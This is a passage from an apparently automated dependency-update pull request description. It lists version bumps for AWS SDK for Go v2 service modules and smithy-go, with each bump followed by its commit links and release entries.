href=\"https://github.com/aws/aws-sdk-go-v2/compare/credentials/v1.19.14...credentials/v1.19.16\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/bedrockruntime` from 1.50.5 to 1.50.6\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/b9b0c6553b80f99603b4f8356b88f5baf1328deb\"\u003e\u003ccode\u003eb9b0c65\u003c/code\u003e\u003c/a\u003e Release 2025-10-16\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e2bc8a0ec6f430876fc7de4432ea9cc89c9568f8\"\u003e\u003ccode\u003ee2bc8a0\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/8691ee380a96c49351e4b5ab8a70bc5d4d100724\"\u003e\u003ccode\u003e8691ee3\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/51e8a3fe032fc566d31b389f492ab58475a98398\"\u003e\u003ccode\u003e51e8a3f\u003c/code\u003e\u003c/a\u003e bump to go1.23 (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3211\"\u003e#3211\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/ad2d36cba7c5772b4e8e4caf96939dc41b95c65c\"\u003e\u003ccode\u003ead2d36c\u003c/code\u003e\u003c/a\u003e Release 2025-10-15\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/19a35d639f969ee328553e632e8cf8b83d324106\"\u003e\u003ccode\u003e19a35d6\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/35cb02fd50fb125601b9c3b33feb72f3a2bcaa56\"\u003e\u003ccode\u003e35cb02f\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/f673a1b0a80e666c0128ec606ff053dace9771f1\"\u003e\u003ccode\u003ef673a1b\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/48421fd812d8592a4eb2b32d11ae07e228969012\"\u003e\u003ccode\u003e48421fd\u003c/code\u003e\u003c/a\u003e Release 2025-10-14\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/fedcba778c21b451a91b4e4bcdd5d6c1554c6a5a\"\u003e\u003ccode\u003efedcba7\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/service/ssm/v1.50.5...service/ecr/v1.50.6\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/cloudwatch` from 1.45.3 to 1.57.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/7c25c211744bdcff47a7203a7a894b1241f9da50\"\u003e\u003ccode\u003e7c25c21\u003c/code\u003e\u003c/a\u003e Release 2024-06-26\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/b374423feaf0b04f01c7624b10915871e589b8a1\"\u003e\u003ccode\u003eb374423\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/923f54ea6016e1c70ad45ba0854e7361a72c3ba6\"\u003e\u003ccode\u003e923f54e\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/5f3bdfcf190150f62a7a07a03bc32d9c58a68f2e\"\u003e\u003ccode\u003e5f3bdfc\u003c/code\u003e\u003c/a\u003e track changes for string_array endpoint parameters (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/2699\"\u003e#2699\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2b4498c633741e24ff4930313610096601dc4036\"\u003e\u003ccode\u003e2b4498c\u003c/code\u003e\u003c/a\u003e Release 2024-06-25\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/332d372bb946f0d50cae58f9401b9c1244e4b818\"\u003e\u003ccode\u003e332d372\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/9397b8d8c05eb1528910ba81881797e7c0e53d17\"\u003e\u003ccode\u003e9397b8d\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/674e1e4412ce44325902125c935ce124d0bfaf4f\"\u003e\u003ccode\u003e674e1e4\u003c/code\u003e\u003c/a\u003e Release 2024-06-24\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/406eeb4367bab3ac49b75fbd2d842186e961f4f0\"\u003e\u003ccode\u003e406eeb4\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/17bd894f3c3842d21d5963bc23213397557c3105\"\u003e\u003ccode\u003e17bd894\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/service/rds/v1.45.3...service/s3/v1.57.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/cloudwatchlogs` from 1.51.0 to 1.73.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/8fac7d48b4707a8fdd9cb23b34b928fc83e38777\"\u003e\u003ccode\u003e8fac7d4\u003c/code\u003e\u003c/a\u003e Release 2025-01-15\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/9eff8acbf1cc8bb294171b969a8e2803bf235a07\"\u003e\u003ccode\u003e9eff8ac\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/f47aa72637a4492512213811a314dda0b9c9a189\"\u003e\u003ccode\u003ef47aa72\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/5934dd36b8ecbc42a321216e8da721e1258ae8a8\"\u003e\u003ccode\u003e5934dd3\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/6636822440828c3eebaacfe9a182c9eb47895236\"\u003e\u003ccode\u003e6636822\u003c/code\u003e\u003c/a\u003e feat: flexible checksum updates (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/2808\"\u003e#2808\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/4ffbb7cbe6bfeebb50a773d45df57d3fd126cafb\"\u003e\u003ccode\u003e4ffbb7c\u003c/code\u003e\u003c/a\u003e Release 2025-01-14\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2f70ff490c3474a59ca29dc2661ec5e4f13ec2f7\"\u003e\u003ccode\u003e2f70ff4\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/434159f5c088eb7b484fea9179d6c5e6302e4610\"\u003e\u003ccode\u003e434159f\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/a80fac9aee1efaac1d16f4005ccc93fed22c62c3\"\u003e\u003ccode\u003ea80fac9\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/44e779abca3ec6dfdc9415ced6af0aa684149bd1\"\u003e\u003ccode\u003e44e779a\u003c/code\u003e\u003c/a\u003e fix several waiter issues (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/2953\"\u003e#2953\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/service/s3/v1.51.0...service/s3/v1.73.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/ec2` from 1.296.0 to 1.300.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/dc2d13fa6f1db25f1c6d804567e1ecfcdff4f040\"\u003e\u003ccode\u003edc2d13f\u003c/code\u003e\u003c/a\u003e Release 2026-05-04\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/da4bcffa913dc4ba46e1ce10a6268bf075547a8d\"\u003e\u003ccode\u003eda4bcff\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/a8b1180254cba3e23aa6baece26783395e884d81\"\u003e\u003ccode\u003ea8b1180\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/a7078055860a55b00b76d6405baaa3f4f27094a5\"\u003e\u003ccode\u003ea707805\u003c/code\u003e\u003c/a\u003e Release 2026-05-01\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/657bacf7f10746f434840a3d734e9e2895a84098\"\u003e\u003ccode\u003e657bacf\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/29b6d377e2ecb35afe2b2f81914f62f33b6e8482\"\u003e\u003ccode\u003e29b6d37\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2328c4178cc3a828ada0e914dcba16b23eb548c6\"\u003e\u003ccode\u003e2328c41\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/83b34eacc84bae944779445d005bd25eb111fc25\"\u003e\u003ccode\u003e83b34ea\u003c/code\u003e\u003c/a\u003e Release 2026-04-30\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/f6eecf01d048da426be6809b82ee740e0bf21858\"\u003e\u003ccode\u003ef6eecf0\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/3cca141ddf7d9e6ad796eec7c3395f0f0714bba8\"\u003e\u003ccode\u003e3cca141\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/service/ec2/v1.296.0...service/ec2/v1.300.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/oam` from 1.18.3 to 1.23.17\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2223642aeafb3b46ae924667ee47d31a1cf5a9d5\"\u003e\u003ccode\u003e2223642\u003c/code\u003e\u003c/a\u003e Release 2026-04-29\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/04c7e460121eafa42577be08289bd0da0de091b2\"\u003e\u003ccode\u003e04c7e46\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/5f5692571a7afce76e1573da3fbf2180a2c297cc\"\u003e\u003ccode\u003e5f56925\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/aac6d2b8fefd47203d3b4bd5f229ca275272ec62\"\u003e\u003ccode\u003eaac6d2b\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/bdaead7d2074e479fc56da77491fe65737413664\"\u003e\u003ccode\u003ebdaead7\u003c/code\u003e\u003c/a\u003e upgrade to smithy-go v1.25.1 (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3399\"\u003e#3399\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/008e12cf64f41c37faeb705f6ce4b77471756f9f\"\u003e\u003ccode\u003e008e12c\u003c/code\u003e\u003c/a\u003e Release 2026-04-27\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/ef109d91f0b772aaebc472633edf13ec0fd907ce\"\u003e\u003ccode\u003eef109d9\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/6411e6379e509956413b866481ee2362a7cdfc68\"\u003e\u003ccode\u003e6411e63\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e5bf970956db306bf7b5b1bdd8ca71e8cca766b5\"\u003e\u003ccode\u003ee5bf970\u003c/code\u003e\u003c/a\u003e Release 2026-04-24\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/bdbb88c9400c80ed2487f7b498a54c6206b5c62a\"\u003e\u003ccode\u003ebdbb88c\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/config/v1.18.3...service/oam/v1.23.17\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/resourcegroupstaggingapi` from 1.26.6 to 1.31.12\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/4f599a5905bdfa3f6aa482e1e7bb98f7b3f9ec03\"\u003e\u003ccode\u003e4f599a5\u003c/code\u003e\u003c/a\u003e Release 2025-09-29\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/c32a7a8084b2d86eeda99f184e75fdca0b33e5a9\"\u003e\u003ccode\u003ec32a7a8\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/18a065d1689d43c994da970a8750d43844c79896\"\u003e\u003ccode\u003e18a065d\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/af534aa0fb522eb683d484d281d2a017be8a006c\"\u003e\u003ccode\u003eaf534aa\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/67db6904b816b95073883b7ad378384c4839b28c\"\u003e\u003ccode\u003e67db690\u003c/code\u003e\u003c/a\u003e Release 2025-09-26\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/32ee1b5d75fc303c0626a6f5e769f4e08cc491a8\"\u003e\u003ccode\u003e32ee1b5\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/0b431223309a815cffc048072556aa651ee1455f\"\u003e\u003ccode\u003e0b43122\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/44786d920f3627b73a99e81c7b6399dbfcf7ab42\"\u003e\u003ccode\u003e44786d9\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/c98edb73809256823906d7e307ecf3c9abc16700\"\u003e\u003ccode\u003ec98edb7\u003c/code\u003e\u003c/a\u003e update internal endpts comment that was wrong (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3194\"\u003e#3194\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/88da3c8c5569dece0e99802dab638faa047a0db0\"\u003e\u003ccode\u003e88da3c8\u003c/code\u003e\u003c/a\u003e Release 2025-09-25\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/config/v1.26.6...config/v1.31.12\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/s3` from 1.97.1 to 1.100.1\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2223642aeafb3b46ae924667ee47d31a1cf5a9d5\"\u003e\u003ccode\u003e2223642\u003c/code\u003e\u003c/a\u003e Release 2026-04-29\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/04c7e460121eafa42577be08289bd0da0de091b2\"\u003e\u003ccode\u003e04c7e46\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/5f5692571a7afce76e1573da3fbf2180a2c297cc\"\u003e\u003ccode\u003e5f56925\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/aac6d2b8fefd47203d3b4bd5f229ca275272ec62\"\u003e\u003ccode\u003eaac6d2b\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/bdaead7d2074e479fc56da77491fe65737413664\"\u003e\u003ccode\u003ebdaead7\u003c/code\u003e\u003c/a\u003e upgrade to smithy-go v1.25.1 (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3399\"\u003e#3399\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/008e12cf64f41c37faeb705f6ce4b77471756f9f\"\u003e\u003ccode\u003e008e12c\u003c/code\u003e\u003c/a\u003e Release 2026-04-27\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/ef109d91f0b772aaebc472633edf13ec0fd907ce\"\u003e\u003ccode\u003eef109d9\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/6411e6379e509956413b866481ee2362a7cdfc68\"\u003e\u003ccode\u003e6411e63\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e5bf970956db306bf7b5b1bdd8ca71e8cca766b5\"\u003e\u003ccode\u003ee5bf970\u003c/code\u003e\u003c/a\u003e Release 2026-04-24\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/bdbb88c9400c80ed2487f7b498a54c6206b5c62a\"\u003e\u003ccode\u003ebdbb88c\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/service/s3/v1.97.1...service/s3/v1.100.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/secretsmanager` from 1.40.1 to 1.41.7\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2223642aeafb3b46ae924667ee47d31a1cf5a9d5\"\u003e\u003ccode\u003e2223642\u003c/code\u003e\u003c/a\u003e Release 2026-04-29\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/04c7e460121eafa42577be08289bd0da0de091b2\"\u003e\u003ccode\u003e04c7e46\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/5f5692571a7afce76e1573da3fbf2180a2c297cc\"\u003e\u003ccode\u003e5f56925\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/aac6d2b8fefd47203d3b4bd5f229ca275272ec62\"\u003e\u003ccode\u003eaac6d2b\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/bdaead7d2074e479fc56da77491fe65737413664\"\u003e\u003ccode\u003ebdaead7\u003c/code\u003e\u003c/a\u003e upgrade to smithy-go v1.25.1 (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3399\"\u003e#3399\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/008e12cf64f41c37faeb705f6ce4b77471756f9f\"\u003e\u003ccode\u003e008e12c\u003c/code\u003e\u003c/a\u003e Release 2026-04-27\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/ef109d91f0b772aaebc472633edf13ec0fd907ce\"\u003e\u003ccode\u003eef109d9\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/6411e6379e509956413b866481ee2362a7cdfc68\"\u003e\u003ccode\u003e6411e63\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e5bf970956db306bf7b5b1bdd8ca71e8cca766b5\"\u003e\u003ccode\u003ee5bf970\u003c/code\u003e\u003c/a\u003e Release 2026-04-24\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/bdbb88c9400c80ed2487f7b498a54c6206b5c62a\"\u003e\u003ccode\u003ebdbb88c\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/v1.40.1...v1.41.7\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/sts` from 1.41.10 to 1.42.1\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/5aa6e2b081b5d1b038a0cc5d9198c7a37abf6b4c\"\u003e\u003ccode\u003e5aa6e2b\u003c/code\u003e\u003c/a\u003e Release 2023-11-09\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/7dbcd52c14c8f992cb2fec090d826ab30881155e\"\u003e\u003ccode\u003e7dbcd52\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/9b178445e4365543a410efefd6b0262c2ea3eb84\"\u003e\u003ccode\u003e9b17844\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/efa54869c68f9d770c9b83fda176c452906688ce\"\u003e\u003ccode\u003eefa5486\u003c/code\u003e\u003c/a\u003e Allowlist bucket owner header (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/2358\"\u003e#2358\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/5118d3bcdd253fbfd02b8e44966ba7a79ecfbf59\"\u003e\u003ccode\u003e5118d3b\u003c/code\u003e\u003c/a\u003e Release 2023-11-08\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/f3c195fc3bcd7f20ae84bf0f999dc89e2487eaee\"\u003e\u003ccode\u003ef3c195f\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/f24b6a0665313f69c97fd3fa62b351358962bda4\"\u003e\u003ccode\u003ef24b6a0\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/f5a08768ef820ff5efd62a49ba50c61c9ca5dbcb\"\u003e\u003ccode\u003ef5a0876\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/3674c3886336f797ad40b18bb1db8c35f4c7ed91\"\u003e\u003ccode\u003e3674c38\u003c/code\u003e\u003c/a\u003e Release 2023-11-07\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/b856b28d54158b2e3596afcd799cfbafddd843ca\"\u003e\u003ccode\u003eb856b28\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/service/ecs/v1.41.10...service/s3/v1.42.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/smithy-go` from 1.25.0 to 1.25.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/smithy-go/blob/main/CHANGELOG.md\"\u003egithub.com/aws/smithy-go's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease (2026-04-23)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.25.1\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eBug Fix\u003c/strong\u003e: Fixed a memory leak in the LRU cache implementation used by some AWS 